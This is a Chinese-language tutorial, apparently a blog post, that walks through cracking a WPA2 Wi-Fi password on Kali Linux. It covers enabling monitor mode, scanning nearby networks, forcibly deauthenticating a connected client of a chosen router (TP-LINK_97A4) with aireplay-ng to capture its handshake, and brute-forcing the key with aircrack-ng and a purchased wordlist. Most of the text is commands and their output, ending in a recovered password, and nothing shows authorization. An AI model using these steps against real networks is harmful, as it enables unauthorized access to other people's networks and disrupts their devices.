kali学得好,牢饭少不了!!!
原理:
模拟WiFi的已连接设备,强制让其下线重连,获取其握手包,使用密码字典(宝丽)婆洁。
环境(准备工作):
无线网卡:RT3070L
第一行信息
┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 018: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
linux系统
┌──(root㉿kali)-[/home/kali]
└─# head -n 1 /etc/issue
Kali GNU/Linux Rolling \n \l
┌──(root㉿kali)-[/home/kali]
└─# uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux
┌──(root㉿kali)-[/home/kali]
└─# uname -r
6.5.0-kali3-amd64
操作步骤:
步骤1:网卡连接虚拟机系统
网卡连接前 lsusb 查看连接信息
┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
插上网卡后再次查看信息,确保网卡以连上
第一行就是连上的网卡
┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 019: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
步骤2:查看网卡是否识别
ifconfig -a如果出现 wlan0 则说明网卡已连接成功
┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 00:0c:29:b2:db:62 txqueuelen 1000 (Ethernet)
RX packets 15228 bytes 22181855 (21.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1395 bytes 97861 (95.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 884 bytes 44240 (43.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 884 bytes 44240 (43.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4098<BROADCAST,MULTICAST> mtu 1500
ether 14:6b:9c:02:72:1a txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
步骤3:开启网卡监控
airmon-ng start wlan0┌──(root㉿kali)-[/home/kali]
└─# airmon-ng start wlan0
PHY Interface Driver Chipset
phy14 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy14]wlan0 on [phy14]wlan0mon)
(mac80211 station mode vif disabled for [phy14]wlan0)
查看是否监控成功
ifconfig -a如果出现wlan0mon则说明监控成功
┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 00:0c:29:b2:db:62 txqueuelen 1000 (Ethernet)
RX packets 15228 bytes 22181855 (21.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1395 bytes 97861 (95.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 884 bytes 44240 (43.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 884 bytes 44240 (43.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 14-6B-9C-02-72-1A-00-62-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 3281 bytes 559070 (545.9 KiB)
RX errors 0 dropped 3281 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
步骤4:扫描附近WiFi
airodump-ng wlan0mon扫描结果如下 ,确定需要破解的WiFi
本文以TP-LINK_97A4为例
CH 4 ][ Elapsed: 1 min ][ 2024-06-08 01:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
10:63:4B:30:FD:67 -33 30 0 0 12 270 WPA2 CCMP PSK MERCURY_FD67
16:D8:64:51:4F:EE -65 10 0 0 6 270 WPA2 CCMP PSK <length: 0>
F4:2A:7D:38:D5:15 -66 2 0 0 6 270 WPA2 CCMP PSK TP-LINK_D502
14:D8:64:50:4F:EE -66 17 0 0 6 270 WPA2 CCMP PSK TP-LINK_4FEE
C8:75:F4:69:54:92 -56 26 0 0 6 324 WPA2 CCMP PSK CMCC-3u4g
24:69:68:76:97:A4 -37 38 22 0 6 405 WPA2 CCMP PSK TP-LINK_97A4
C0:A4:76:6A:05:EB -55 23 0 0 11 360 WPA2 CCMP PSK CMCC-gURM
70:AF:6A:8C:45:08 -65 3 2 0 11 130 WPA2 CCMP PSK 306
D4:84:09:38:2C:A2 -64 21 1 0 11 270 WPA2 CCMP PSK MERCURY_2CA2
24:CF:24:CD:E9:27 -59 20 0 0 10 130 WPA2 CCMP PSK cpdd
80:8B:1F:98:B2:60 -50 10 0 0 5 270 WPA2 CCMP PSK 504
A4:A9:30:FA:FB:E5 -57 31 10 0 4 130 WPA2 CCMP PSK Xiaomi_FBE4
E0:EF:02:01:67:BD -46 33 6 0 1 360 WPA2 CCMP PSK 403*
80:6B:1F:00:26:23 -66 25 2 0 1 130 WPA2 CCMP PSK XJT-400M_2622
C8:BF:4C:95:CB:CF -59 35 0 0 1 270 WPA2 CCMP PSK Xiaomi_43EF
BSSID STATION PWR Rate Lost Frames Notes Probes
24:69:68:76:97:A4 F2:E6:18:8D:02:54 -40 0 - 6 0 1
24:69:68:76:97:A4 14:13:33:6C:12:9D -44 0 - 1 0 3 TP-LINK_97A4
24:69:68:76:97:A4 76:82:DA:61:E7:B9 -54 1e- 1e 0 31
80:8B:1F:98:B2:60 4A:A5:AA:BB:42:DD -62 0 - 1e 0 6
A4:A9:30:FA:FB:E5 C2:58:EB:56:AA:4A -58 0 -24 0 2
E0:EF:02:01:67:BD F4:D6:20:92:04:42 -44 2e- 1e 0 7
80:6B:1F:00:26:23 5C:D0:6E:DF:49:3A -58 0 - 1e 0 4 步骤5:命令行等待抓取握手包
airodump-ng -w ./GGX -c 6 --bssid 24:69:68:76:97:A4 wlan0mon -ignore-nefative-oneaa
c:指定信道,即步骤4扫描结果CH列内容
-w:指定抓去握手包的存放路径
–bssid:指定路由器的MAC,即步骤4扫描结果的第一列BSSID
需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数
抓取扫描结果,如下,当前WiFi有4台设备连接
CH 6 ][ GPS *** No Fix! *** ][ Elapsed: 36 s ][ 2024-06-08 01:57
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
24:69:68:76:97:A4 -37 100 377 51 0 6 405 WPA2 CCMP PSK TP-LINK_97A4
BSSID STATION PWR Rate Lost Frames Notes Probes
24:69:68:76:97:A4 14:13:33:6C:12:9D -34 0 - 1e 0 15 TP-LINK_97A4
24:69:68:76:97:A4 14:D1:69:11:A5:6C -46 1e- 6 0 32
24:69:68:76:97:A4 F2:E6:18:8D:02:54 -44 1e- 6 0 88
24:69:68:76:97:A4 76:82:DA:61:E7:B9 -48 1e- 1e 1 73 步骤6:抓取握手包
步骤5都界面不需要关闭,模拟期中一台设备,让其断线重连,抓取其握手包。
aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon-0:代表攻击次数,以5次为例
-a:指定路由器的MAC
-c:指定客户机的MAC
└─# aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon
02:05:49 Waiting for beacon frame (BSSID: 24:69:68:76:97:A4) on channel 6
02:05:51 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [80|64 ACKs]
02:05:52 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [68|53 ACKs]
02:05:53 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [86|62 ACKs]
02:05:54 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [65|49 ACKs]
02:05:55 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [67|39 ACKs]
步骤7:抓取握手包结果
回到步骤5打开的终端,如果出现handshake,则说明握手包抓取成功,
如果抓取失败,则模拟另外一台设备,重复步骤6
CH 6 ][ GPS *** No Fix! *** ][ Elapsed: 3 mins ][ 2024-06-08 02:08 ][ WPA handshake: 24:69:68:76:97:A4
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
24:69:68:76:97:A4 -42 96 1745 1577 2 6 405 WPA2 CCMP PSK TP-LINK_97A4
BSSID STATION PWR Rate Lost Frames Notes Probes
24:69:68:76:97:A4 B0:D5:9D:6E:BF:48 1 1e- 1e 0 17
24:69:68:76:97:A4 14:D1:69:11:A5:6C -52 0 - 6 0 8
24:69:68:76:97:A4 F2:E6:18:8D:02:54 -42 1e- 6 0 42
24:69:68:76:97:A4 14:13:33:6C:12:9D -28 11e- 5e 11 1437 EAPOL TP-LINK_97A4
24:69:68:76:97:A4 76:82:DA:61:E7:B9 -52 1e-11e 18 833 观察目录下是否生成文件
┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root 28 Jun 8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root 28 Jun 8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root 5572 Jun 8 02:06 GGX-03.ivs
步骤8:获取密码字典
此步骤非常重要,能否(婆洁)成功就看它了
可以通过某宝获取,或者是网络上搜索
一般购买无线网卡会赠送字典
步骤9:将密码字典拷贝至于握手包文件同一个路径
┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root 28 Jun 8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root 28 Jun 8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root 5572 Jun 8 02:06 GGX-03.ivs
-rw------- 1 kali kali 16391 Jun 2 10:46 wordlist.TXT
步骤10:保利婆洁WiFi密码
aircrack-ng -w wordlist.TXT GGX-0*
wordlist.TXT 是字典
婆洁成功界面,密码越简单越容易被婆洁
KEY FOUND!后面的就是密码
Aircrack-ng 1.7
[00:00:02] 2039/2109 keys tested (1269.26 k/s)
Time left: 0 seconds 96.68%
KEY FOUND! [ 123456 ]
Master Key : 97 77 C9 45 72 B4 90 9C 56 F7 22 AD F1 E0 8A DC
E9 3F 7F 1D A1 D6 AE 79 89 D5 8A FE E1 95 FE 59
Transient Key : 57 E3 41 E7 5A A3 C3 B2 30 09 17 7D 53 B1 60 BC
05 17 02 B5 3C 78 10 5E 79 3C 81 8D A2 5B 94 C4
08 1C DC EC 31 A2 32 6E 96 D9 C3 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : 1C 9E F6 0D 9D 16 92 37 0D 90 6E 9B D9 03 7F B8
